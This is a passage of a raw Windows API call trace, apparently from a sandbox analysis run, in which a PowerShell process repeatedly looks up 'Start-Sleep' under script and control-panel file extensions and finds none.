ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.809] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x3a [0225.810] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0225.810] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.810] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.819] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.819] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x3a [0225.819] GetFullPathNameW (in: lpFileName="Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpFilePart=0x0) returned 0x34 [0225.820] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.820] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.820] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.VBE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.821] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", lpFilePart=0x0) returned 0x39 [0225.821] GetFullPathNameW (in: lpFileName="Start-Sleep.JS", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpFilePart=0x0) returned 0x33 [0225.821] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JS", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.821] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.822] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JS", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.823] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x3a [0225.823] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0225.823] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.823] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.824] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.JSE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.825] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x3a [0225.825] GetFullPathNameW (in: lpFileName="Start-Sleep.WSF", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpFilePart=0x0) returned 0x34 [0225.825] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.825] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.826] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSF", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.826] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x3a [0225.827] GetFullPathNameW (in: lpFileName="Start-Sleep.WSH", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0225.827] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.827] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.828] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.WSH", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.828] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x3a [0225.829] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0225.829] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.829] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.830] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.MSC", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.830] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x3a [0225.830] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0225.831] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.831] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.832] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CPL", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.832] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: 